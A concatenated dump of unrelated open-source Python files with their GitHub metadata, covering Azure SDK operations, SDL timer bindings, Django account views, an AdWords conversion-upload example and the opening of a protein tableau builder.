if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('BuildServiceAgentPoolResource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('BuildServiceAgentPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_put_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/buildServices/{buildServiceName}/agentPools/{agentPoolName}"} # type: ignore
@distributed_trace_async
async def begin_update_put(
self,
resource_group_name: str,
service_name: str,
build_service_name: str,
agent_pool_name: str,
agent_pool_resource: "_models.BuildServiceAgentPoolResource",
**kwargs: Any
) -> AsyncLROPoller["_models.BuildServiceAgentPoolResource"]:
"""Create or update build service agent pool.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param build_service_name: The name of the build service resource.
:type build_service_name: str
:param agent_pool_name: The name of the build service agent pool resource.
:type agent_pool_name: str
:param agent_pool_resource: Parameters for the update operation.
:type agent_pool_resource:
~azure.mgmt.appplatform.v2022_04_01.models.BuildServiceAgentPoolResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either BuildServiceAgentPoolResource or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.appplatform.v2022_04_01.models.BuildServiceAgentPoolResource]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2022-04-01") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.BuildServiceAgentPoolResource"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_put_initial(
resource_group_name=resource_group_name,
service_name=service_name,
build_service_name=build_service_name,
agent_pool_name=agent_pool_name,
agent_pool_resource=agent_pool_resource,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('BuildServiceAgentPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_put.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/buildServices/{buildServiceName}/agentPools/{agentPoolName}"} # type: ignore
| {
"content_hash": "511de24d574b5b36d8c7857d2d6a36dd",
"timestamp": "",
"source": "github",
"line_count": 338,
"max_line_length": 241,
"avg_line_length": 46.781065088757394,
"alnum_prop": 0.655135340247913,
"repo_name": "Azure/azure-sdk-for-python",
"id": "44f4ab35cbc5f0c910af96405b291959261e35f1",
"size": "16312",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/appplatform/azure-mgmt-appplatform/azure/mgmt/appplatform/v2022_04_01/aio/operations/_build_service_agent_pool_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Static()
result.template = "object/static/firework/shared_fx_01.iff"
result.attribute_template_id = -1
result.stfName("obj_n","unknown_object")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "8ff901035f13b692fd0748960208d729",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 60,
"avg_line_length": 22.23076923076923,
"alnum_prop": 0.6816608996539792,
"repo_name": "obi-two/Rebelion",
"id": "bd5052c90a1248bd0b5379e9e9acd95b09c46425",
"size": "434",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/static/firework/shared_fx_01.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from target_kinetis import Kinetis
import logging
class K20D50M(Kinetis):
memoryMapXML = """<?xml version="1.0"?>
<!DOCTYPE memory-map PUBLIC "+//IDN gnu.org//DTD GDB Memory Map V1.0//EN" "http://sourceware.org/gdb/gdb-memory-map.dtd">
<memory-map>
<memory type="flash" start="0x0" length="0x20000"> <property name="blocksize">0x400</property></memory>
<memory type="ram" start="0x1fffe000" length="0x4000"> </memory>
</memory-map>
"""
def __init__(self, transport):
super(K20D50M, self).__init__(transport)
self.auto_increment_page_size = 0x400
self.mdm_idr = 0x001c0000
| {
"content_hash": "0903a8425bcd83807c89bf3874286bbe",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 121,
"avg_line_length": 34.30555555555556,
"alnum_prop": 0.708502024291498,
"repo_name": "NordicSemiconductor/pyOCD",
"id": "f5d226919bde823268baa282324654227ae5ae20",
"size": "1235",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyOCD/target/target_k20d50m.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "174778"
}
],
"symlink_target": ""
} |
"""Time management routines.
"""
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
from ctypes import *
from . import dll
SDL_GetTicks = dll.function(
'SDL_GetTicks',
'''Get the number of milliseconds since the SDL library initialization.
Note that this value wraps if the program runs for more than ~49 days.
:rtype: int
''',
args=[],
arg_types=[],
return_type=c_uint)
SDL_Delay = dll.function(
'SDL_Delay',
'''Wait a specified number of milliseconds before returning.
:Parameters:
`ms` : int
delay in milliseconds
''',
args=['ms'],
arg_types=[c_uint],
return_type=None)
_SDL_TimerCallback = CFUNCTYPE(c_int, c_uint)
_SDL_SetTimer = dll.private_function(
'SDL_SetTimer',
arg_types=[c_uint, _SDL_TimerCallback],
return_type=c_int)
_timercallback_ref = None # Keep global to avoid possible GC
def SDL_SetTimer(interval, callback):
"""Set a callback to run after the specified number of milliseconds has
elapsed.
The callback function is passed the current timer interval
and returns the next timer interval. If the returned value is the
same as the one passed in, the periodic alarm continues, otherwise a
new alarm is scheduled. If the callback returns 0, the periodic alarm
is cancelled.
To cancel a currently running timer, call ``SDL_SetTimer(0, None)``.
The timer callback function may run in a different thread than your
main code, and so shouldn't call any functions from within itself.
The maximum resolution of this timer is 10 ms, which means that if
you request a 16 ms timer, your callback will run approximately 20 ms
later on an unloaded system. If you wanted to set a flag signaling
a frame update at 30 frames per second (every 33 ms), you might set a
timer for 30 ms::
SDL_SetTimer((33/10)*10, flag_update)
If you use this function, you need to pass `SDL_INIT_TIMER` to
`SDL_Init`.
Under UNIX, you should not use raise or use SIGALRM and this function
in the same program, as it is implemented using ``setitimer``. You
also should not use this function in multi-threaded applications as
signals to multi-threaded apps have undefined behavior in some
implementations.
:Parameters:
`interval` : int
Interval before callback, in milliseconds.
`callback` : function
Callback function should accept one argument, the number of
milliseconds elapsed, and return the next timer interval,
in milliseconds.
"""
# Note SDL_SetTimer actually returns 1 on success, not 0 as documented
# in SDL_timer.h.
global _timercallback_ref
if callback:
_timercallback_ref = _SDL_TimerCallback(callback)
else:
_timercallback_ref = _SDL_TimerCallback()
# XXX if this fails the global ref is incorrect and old one will
# possibly be collected early.
if _SDL_SetTimer(interval, _timercallback_ref) == -1:
raise SDL.error.SDL_Exception(SDL.error.SDL_GetError())
# For the new timer functions, the void *param passed to the callback
# is ignored; using an local function instead. The SDL_TimerID type
# is not defined, we use c_void_p instead.
_SDL_NewTimerCallback = CFUNCTYPE(c_uint, c_int, c_void_p)
_SDL_AddTimer = dll.private_function(
'SDL_AddTimer',
arg_types=[c_uint, _SDL_NewTimerCallback, c_void_p],
return_type=c_void_p)
_timer_refs = {} # Keep global to manage GC
def SDL_AddTimer(interval, callback, param):
"""Add a new timer to the pool of timers already running.
:Parameters:
`interval` : int
The interval before calling the callback, in milliseconds.
`callback` : function
The callback function. It is passed the current timer
interval, in millseconds, and returns the next timer interval,
in milliseconds. If the returned value is the same as the one
passed in, the periodic alarm continues, otherwise a new alarm
is scheduled. If the callback returns 0, the periodic alarm is
cancelled. An example callback function is::
def timer_callback(interval, param):
print('timer called after %d ms.' % interval)
return 1000 # call again in 1 second
`param` : any
A value passed to the callback function.
:rtype: int
:return: the timer ID
"""
def _callback(interval, _ignored_param):
return callback(interval, param)
func = _SDL_NewTimerCallback(_callback)
result = _SDL_AddTimer(interval, func, None)
if not result:
raise SDL.error.SDL_Exception(SDL.error.SDL_GetError())
_timer_refs[result] = func
return result
_SDL_RemoveTimer = dll.private_function(
'SDL_RemoveTimer',
args=['t'],
arg_types=[c_void_p],
return_type=c_int,
error_return=0)
def SDL_RemoveTimer(t):
"""Remove one of the multiple timers knowing its ID.
:Parameters:
`t` : int
The timer ID, as returned by `SDL_AddTimer`.
"""
global _timer_refs
_SDL_RemoveTimer(t)
del _timer_refs[t]
| {
"content_hash": "ebc54e54116431266f3bcf0a225c5f58",
"timestamp": "",
"source": "github",
"line_count": 165,
"max_line_length": 75,
"avg_line_length": 31.78787878787879,
"alnum_prop": 0.6585319351763584,
"repo_name": "dangillet/cocos",
"id": "b1843b7ce6824589d84de7697a318f1f52cb68c7",
"size": "5268",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "cocos/audio/SDL/timer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "7097"
},
{
"name": "Makefile",
"bytes": "6766"
},
{
"name": "Python",
"bytes": "1352722"
}
],
"symlink_target": ""
} |
import oandapyV20
account_id = #inserisci il TUO account_id
key = #inserisci la key
api = oandapyV20.API(environment="practice", access_token=key)
| {
"content_hash": "1336685b77963c1a0950295e2927a512",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 62,
"avg_line_length": 30.8,
"alnum_prop": 0.7402597402597403,
"repo_name": "matteonicolo/Forex",
"id": "446881c1ed4a49dc6da1ede79ce071bfca26dfb5",
"size": "154",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "35668"
}
],
"symlink_target": ""
} |
from kludd.routes.interval import interval
from kludd.routes.specific import specific
| {
"content_hash": "65dc7192c25d14a82ffeb833272c0179",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 42,
"avg_line_length": 43,
"alnum_prop": 0.8604651162790697,
"repo_name": "Owlree/kludd",
"id": "d77b4a639ec4383d3274126276de81c72212c0d3",
"size": "86",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kludd/routes/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "15037"
}
],
"symlink_target": ""
} |
from setuptools import setup
setup(name='django-museum',
version='0.2.1',
description='Manage different picture sizes easily in your Django project.',
url='https://github.com/franciscomoma/django-museum',
author='Francisco Molina',
author_email='franciscomoma@gmail.com',
license='MIT',
packages=['museum'],
install_requires=[
'Pillow==4.1.1',
'python-resize-image==1.1.11'
],
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Framework :: Django :: 1.10.7',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6'
],
zip_safe=False) | {
"content_hash": "5bc6e27a90e3605a5b0fec2f0545981f",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 82,
"avg_line_length": 33.92,
"alnum_prop": 0.5860849056603774,
"repo_name": "franciscomoma/django-museum",
"id": "36026482f61eebed767bbc72ee10d3b23f20083e",
"size": "848",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "11227"
}
],
"symlink_target": ""
} |
from django.shortcuts import render,redirect, get_object_or_404
import django_bolts.utils as cutils
from django.contrib.auth.models import User
from django.contrib.sites.models import get_current_site
from django.http import HttpResponseForbidden,HttpResponse
from django.template.loader import render_to_string
from django_bolts.views.resource import Resource
from django_bolts.views.decorators import view
from django_bolts.models import EmailConfirmation, RegistrationProfile
import json
def post_activation_email(self,request,user):
from django.template import RequestContext
from django.utils.safestring import mark_safe
from django.utils.text import normalize_newlines
ctx = RequestContext(self,request)
subject = render_to_string("registration/post_activation_email_subject.txt",{'user':user},ctx)
content = render_to_string("registration/post_activation_email.txt",{'user':user},ctx)
normalized_text = normalize_newlines(subject)
subject = mark_safe(normalized_text.replace('\n', ' '))
user.email_user(subject,content)
class AccountsResource(Resource):
template_prefix = 'registration'
verbose_name = 'accounts'
url_prefix = 'accounts'
create_form = None
edit_form = None
abstract = True
def get_url_pattern(self):
from django.conf.urls import patterns, include, url
prefix = self.url_prefix
urlpatterns = patterns( '',
url(r'^%s/'%prefix, include('django.contrib.auth.urls')),
)
pattern = urlpatterns + Resource.get_url_pattern(self)
return pattern
@view("(\w+)")
def activate(self,request,activation_key):
account = RegistrationProfile.objects.activate_user(activation_key)
if account:
post_activation_email(self,request,account)
return redirect('accounts_activation_done')
return {}
@view()
def activation_done(self,request): return
@view()
def activation_begin(self,request): return
@view()
def registration_done(self,request): return
def registration_forbidden(self,request):
return HttpResponseForbidden(status=403,content='Forbidden')
@view()
def add_user(self,request):
ctx = {}
if request.user.is_authenticated():
return self.registration_forbidden(request)
if request.method == 'POST':
form = self.create_form(request.POST,request.FILES)
if form.is_valid():
user = self.create_user(request,form)
user.save()
if not user.is_active:
site = get_current_site(self.request)
registration_profile = RegistrationProfile.objects.create_profile(user)
registration_profile.send_activation_email(site)
return redirect('accounts_activation_begin')
else:
return redirect('accounts_registration_done')
else:
form = self.create_form()
ctx['form'] = form
return ctx
def is_signup_allowed(self):
pass
def create_user(self,form):
pass
@view("(\w+)")
def email_confirm(self,request,activation_key):
account = EmailConfirmation.objects.confirm(activation_key)
return render(self,request,'registration/email_confirmation.html',{'account':account})
@view("(\d+)")
def avatar(self,request,uid):
user = get_object_or_404(User,pk=uid)
url = user.get_avatar_url()
return redirect(url)
@view("(\d+)")
def profile(self,request,uid):
user = get_object_or_404(User,pk=uid)
url = user.get_profile().get_absolute_url()
return redirect(url)
@view("(\w+)")
def presence(self,request,username):
user = get_object_or_404(User,username=username)
return HttpResponse(content=str( user.presence ), status = 200 )
@view()
def check_username(self,request):
name = request.GET.get('username',False)
if name:
result = User.objects.filter(username__iexact=name).exists()
else:
result = name
return HttpResponse(content=json.dumps(not result),mimetype='plain/text',status=200)
@view()
def check_email(self,request):
email = request.GET.get('email',False)
if email:
result = User.objects.filter(email__iexact=email).exists()
else:
result = email
return HttpResponse(content=json.dumps(not result),mimetype='plain/text',status=200)
#from django.contrib.auth.views import AuthenticationForm, login as orig_login
#
#def login(request):
## if request.is_ajax():
## return render(request,"registration/login_xhr.html", dict( form = AuthenticationForm() ) )
## else:
# return orig_login(request)
| {
"content_hash": "2cb52cb4a0057d91eab23106690d1920",
"timestamp": "",
"source": "github",
"line_count": 140,
"max_line_length": 120,
"avg_line_length": 37.5,
"alnum_prop": 0.5994285714285714,
"repo_name": "vivek2010/django_bolts",
"id": "a2be6e150f9a7d1100699d0b8101f3214b8820e0",
"size": "5250",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_bolts/views/accounts.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "135421"
}
],
"symlink_target": ""
} |
from unittest import TestCase
import numpy as np
import pandas as pd
import hf_bi
| {
"content_hash": "faa8464a61b0297d812368ac52d6b6a1",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 29,
"avg_line_length": 18,
"alnum_prop": 0.7444444444444445,
"repo_name": "welfare520/hf_bi",
"id": "bc23f94eeceb93eb1b5f206515c18567fa84997e",
"size": "90",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hf_bi/tests/test_churn.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "954"
}
],
"symlink_target": ""
} |
import sys
import sqwiggle
if len(sys.argv) < 4 :
print('There should be 4 arguments')
sys.exit(1)
token = str(sys.argv[1])
room_id = str(sys.argv[2])
message = str(sys.argv[3])
client = sqwiggle.Sqwiggle(token=token)
client.method('/messages', method='POST', parameters={'room_id': room_id, 'text': message, 'format': 'html', 'parse': False})
| {
"content_hash": "458a06f82ddc6d461dc9afdf0f9c707e",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 125,
"avg_line_length": 27.307692307692307,
"alnum_prop": 0.6704225352112676,
"repo_name": "hijonathan/step-sqwiggle-notify",
"id": "51e68304f057481a1be56a6c47067e78efa16e01",
"size": "355",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "main.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2190"
},
{
"name": "Shell",
"bytes": "2052"
}
],
"symlink_target": ""
} |
"""Imports offline conversion values for specific clicks into your account.
To get THE Google Click ID for a click, run a CLICK_PERFORMANCE_REPORT.
Tags: ConversionTrackerService.mutate, OfflineConversionFeedService.mutate
"""
__author__ = 'Joseph DiLallo'
from googleads import adwords
CONVERSION_NAME = 'INSERT_CONVERSION_NAME_HERE'
# Your click ID must be less than 30 days old.
CLICK_ID = 'INSERT_GOOGLE_CLICK_ID_HERE'
# The conversion time must be more recent than the time of the click.
CONVERSION_TIME = 'INSERT_CONVERSION_TIME_HERE'
CONVERSION_VALUE = 'INSERT_CONVERSION_VALUE_HERE'
def main(client, conversion_name, click_id, conversion_time, conversion_value):
# Initialize appropriate services.
conversion_tracker_service = client.GetConversionTrackerService(
version='v201309')
offline_conversion_feed_service = client.GetOfflineConversionFeedService(
version='v201309')
# Once created, this entry will be visible under
# Tools and Analysis->Conversion and will have "Source = Import".
upload_conversion = {
'xsi_type': 'UploadConversion',
'category': 'PAGE_VIEW',
'name': conversion_name,
'viewthroughLookbackWindow': '30',
'ctcLookbackWindow': '90'
}
upload_conversion_operation = {
'operator': 'ADD',
'operand': upload_conversion
}
response = conversion_tracker_service.mutate(
[upload_conversion_operation])
new_upload_conversion = response['value'][0]
print ('New upload conversion type with name \'%s\' and ID \'%s\' was '
'created.' % (new_upload_conversion['name'],
new_upload_conversion['id']))
# Associate offline conversions with the upload conversion we created.
feed = {
'conversionName': conversion_name,
'conversionTime': conversion_time,
'conversionValue': conversion_value,
'googleClickId': click_id
}
offline_conversion_operation = {
'operator': 'ADD',
'operand': feed
}
offline_conversion_response = offline_conversion_feed_service.mutate(
[offline_conversion_operation])
new_feed = offline_conversion_response['value'][0]
print ('Uploaded offline conversion value of \'%s\' for Google Click ID '
'\'%s\' to \'%s\'.' % (new_feed['conversionValue'],
new_feed['googleClickId'],
new_feed['conversionName']))
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client, CONVERSION_NAME, CLICK_ID, CONVERSION_TIME,
CONVERSION_VALUE)
| {
"content_hash": "cf89ac135105786bf5edba903d77390d",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 79,
"avg_line_length": 32.6375,
"alnum_prop": 0.6790501723477594,
"repo_name": "jdilallo/jdilallo-test",
"id": "7dc63846f1c74aacbf877336402919743a91c5e6",
"size": "3229",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/adwords/v201309/advanced_operations/upload_offline_conversions.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "722738"
}
],
"symlink_target": ""
} |
"""
Build a protein tableau.
The implemntation is actually in pttableau.py which is used by ptgraph2.py
(Pro-Origami),
Also used to create SSE midpoint distance matrix.
Tableaux are described by Kamat and Lesk 2007
'Contact Patterns Between Helices and Strands of Sheet Define Protein
Folding Patterns' Proteins 66:869-876
and Lesk 2003 'From Electrons to Proteins and Back Again'
Int. J. Quant. Chem. 95:678-682
and Lesk 1995 'Systematic representation of folding patterns'
J. Mol. Graph. 13:159-164.
The implementation is based on Arun Konagurthu's TableauCreator program, see
Konagurthu, Stuckey and Lesk 2008 'Structural search and retrieval using
a tableau representation of protein folding patterns' Bioinformatics
(advance access, to be published Jan 5 2008).
Filenames may be either in the format above or the pdbq1lp.pdb format.
Compressed pdb files are supported (gzip) (e.g. pdb1qlp.ent.gz).
It is written in Python and depends on some Python libraries:
. BioPython (including Bio.PDB)
http://www.biopython.org
Reference for Bio.PDB is:
Hamelryck and Manderick 2003 "PDB parser and structure class implemented
in Python" Bioinformatics 19:2308-2310
which in turn depends on Numeric
http://sourceforge.net/projects/numpy
Developed on Linux 2.6.9 (x86_64) with Python 2.5.1
and BioPython 1.43 with Numeric 24.2
"""
import warnings # so we can suppress the annoying tempnam 'security' warning
import sys,os
import getopt
import numpy.oldnumeric as Numeric
from Bio.PDB import *
from ptnode import *
import pttableau
import ptsecstruct
from ptdomain import *
from ptutils import cleanup_tmpdir,get_int_icode,biopdbresid_to_pdbresseq
from domeval import *
import getdomains
from ptdistmatrix import compute_sse_midpoint_dist_matrix
#-----------------------------------------------------------------------------
#
# Class definitions
#
#-----------------------------------------------------------------------------
#
# Empty classes for exceptions
#
class NoSSE_Exception(Exception): # raised when no helices or strands found
pass
#
# Real classes
#
class TableauBuild:
"""
The protein representation consists of a sequence of structure
(helix, strand) nodes with sequence edges in and out of them in
sequence from N-terminus to C-terminus and adjacency edges for
SSEs less than a threshold distance apart.
Note there may be multiple such sequences (one for each
chain).
Also the nodes are all labelled with start and end residue
sequence numbers, and node types etc. but this is not used at all
in the here, it is only included because this code was reused from
another program (ptraph2.py) which does require the node
labelling.
"""
#
# member functions
#
def __init__(self, pdb_structure, pdbid,
include_310_helices = False, include_pi_helices = False,
add_loop_nodes = False):
"""
Construct empty TableauBuild. To build the structure call
build_graph_from_secstruct().
Parameters:
pdb_structure - parsed PDB structure from Bio.PDB
pdbid - PDB identifier
include_310_helices - include 3_10 helices in the graph if True
include_pi_helices - include pi_helices in the graph if True
add_loop_nodes - include nodes for loop regions between SSEs if True
"""
self.pdb_struct = pdb_structure
self.pdbid = pdbid
self.chain_dict = None # Each value of the chain_dict is a
# List of nodes in order from N to C terminus
# so chain_dict is { chainid : node_list }
self.seqnum2node = {} # dictionary of { seqnum : PTNode }
# maping int sequence numbers to PTNode objs
self.tableau = None # PTTableau build in build_tableau
self.include_310_helices = include_310_helices
self.include_pi_helices = include_pi_helices
self.pdb_resid_dict = None # dict of { {chainid,pdb_resseq) : seqindx }
# where chainid and pdb_resseq make up
# the PDB residue identifier, the pdb_resseq
# being string resnum+icode if any e.g.
# '60' or '60A', seqindx is the indiex
# into sequential list of all residues
# residue_list.
self.residue_list = None # list of all residues (for all chains)
# in sequence, built by get_residue_list()
def iter_chains(self):
"""
This generator function iterates over all chains in this PTGraph.
A chain is just a list of nodes so it yields a node list for each
chain.
Parameters: Nonde.
Return value: YIELDs a node list.
Uses data members (readony):
chain_dict - dict of {chainid:node_list}
"""
# FIXME: can we just 'return self.chain_dict.itervalues()' here?
for nodelist in self.chain_dict.itervalues():
yield nodelist
def iter_nodes(self):
"""
This generator function iterates over all the node in this PTGraph.
Parameters: None
Return Value: YIELDs a node.
Uses data members: (readonly):
chain_dict - dict of {chainid_node_list}
"""
for nodelist in self.iter_chains():
for ptnode in nodelist:
yield ptnode
def build_graph_from_secstruct(self, secstruct, domain, chainid=None,
ignore_insertion_codes=False):
"""
Build the list of nodes from the the supplied PTSecStruct
object.
Parameters:
secstruct - PTSecStruct (ptsecstruct.py) object to build from
domain - PTDomain (ptdomain.py) object listing the segment(s)
that make up this domain (only one domain processed at a
time).
(in/out) NOTE: may be modified by having a segment
added if SSE is only partly in domain.
chainid - chain identifier to build graph for only this chain,
or None for all chains (default)
ignore_insertion_codes - If True, a hack to make it work with
PMML (only) which does not report insertion codes
unlike DSSP and STRIDE
Uses member data (write):
chain_dict - dict of { chainid : node_list } where node_list is
list of nodes in order, built in this function
secstruct - keeps a pointer to the supplied secstruct
(readonly):
pdb_struct - The Bio.PDB parsed PDB struct (atomic co-ordinates)
for this protein.
include_310_helices, include_pi_helices - if true, include
these kinds of helices.
Raises exceptions:
NoSSE_Exception if no helices or strands found
Return value:
None.
"""
self.secstruct = secstruct
helix_num = 1
strand_num = 1
num_helices_in_domain = 0
num_strands_in_domain = 0
#
# Build dictionary mapping (chainid, pdb_resid) to index in residue_list
# for ALL residues, not just those in this domain.
#
self.residue_list = self.get_residue_list(self.pdb_struct,
PTDomain(None, None))
self.pdb_resid_dict = {}
seq_indx = 0
while seq_indx < len(self.residue_list):
residue = self.residue_list[seq_indx]
self.pdb_resid_dict[( ptsecstruct.pdb_chainid_to_stride_chainid(
residue.get_full_id()[2]),
biopdbresid_to_pdbresseq(
residue.get_id(),
ignore_insertion_codes)
)] = seq_indx
seq_indx += 1
# Note that now we are only adding elements in the supplied domain,
# so the so-called 'chains' may really be segments, i.e. subsequences
# of chains (rest of chain may be in other domain(s)
self.chain_dict = {} # dict of {chainid : node_list}
for (start_chainid, start_resnum, end_chainid, end_resnum, helixtype) \
in secstruct.helix_list:
assert(start_chainid == end_chainid) #helix must be same chain
if chainid and chainid != start_chainid:
continue # chainid specified, skip ones not in that chain
# will consider structures in domain if first residue is in domain
if domain.is_in_domain(start_chainid,
get_int_icode(start_resnum)[0]):
num_helices_in_domain += 1
if helixtype == "H":
idprefix = "ALPHAHELIX_"
htype = "ALPHA"
this_helix_num = helix_num
helix_num += 1
elif helixtype == "I":
if not self.include_pi_helices:
continue
idprefix = "PIHELIX_"
htype = "PI"
this_helix_num = helix_num
helix_num += 1
elif helixtype == "G":
if not self.include_310_helices:
continue
idprefix = "310HELIX_"
htype = "310"
this_helix_num = helix_num
helix_num += 1
else: # shouldn't happen
sys.stderr.write("ERROR: bad helix type " + helixtype+"\n")
ah_node = PTNodeHelix(htype,
idprefix + start_chainid+"_" +\
str(this_helix_num),
this_helix_num,
start_resnum, end_resnum, start_chainid,
domain.domainid,
self.residue_list, self.pdb_resid_dict)
if not self.chain_dict.has_key(start_chainid):
self.chain_dict[start_chainid] = []
self.chain_dict[start_chainid].append(ah_node)
# we must already have handled the case of SSEs that cross
# domain boundaries (by moving whole SSE to one of the domains)
assert( domain.is_in_domain(end_chainid, get_int_icode(end_resnum)[0]) )
for (start_chainid, start_resnum, end_chainid, end_resnum) \
in secstruct.strand_list:
assert(start_chainid == end_chainid) # must be in same chain
if chainid and chainid != start_chainid:
continue # chainid specified, skip ones not in that chain
if domain.is_in_domain(start_chainid,
get_int_icode(start_resnum)[0]):
num_strands_in_domain += 1
bs_node = PTNodeStrand("STRAND_"+start_chainid +"_"+\
str(strand_num),
strand_num,
start_resnum, end_resnum, start_chainid,
domain.domainid,
self.residue_list,
self.pdb_resid_dict)
strand_num += 1
if not self.chain_dict.has_key(start_chainid):
self.chain_dict[start_chainid] = []
# we must already have handled the case of SSEs that cross
# domain boundaries (by moving whole SSE to one of the domains)
assert( domain.is_in_domain(end_chainid, get_int_icode(end_resnum)[0]) )
self.chain_dict[start_chainid].append(bs_node)
# raise an exception if there are no SSEs at all in this domain
if num_helices_in_domain == 0 and num_strands_in_domain == 0:
raise NoSSE_Exception
delete_chainid_list = [] # list of chainids to delete from chain_dict
for (chainid, nodelist) in self.chain_dict.iteritems():
# sort in order of start residue id ascending (all must be disjoint)
nodelist.sort()
if len(nodelist) < 1:
# There are no SSEs in this chain, get rid of it.
sys.stderr.write('WARNING: no SSEs in chain ' + chainid +
'; chain ignored\n')
delete_chainid_list.append(chainid) # don't delete while in loop
continue
else:
# Check for chain with only SSEs that will not be drawn
# (i.e. pi or 310 helices), and delete those too
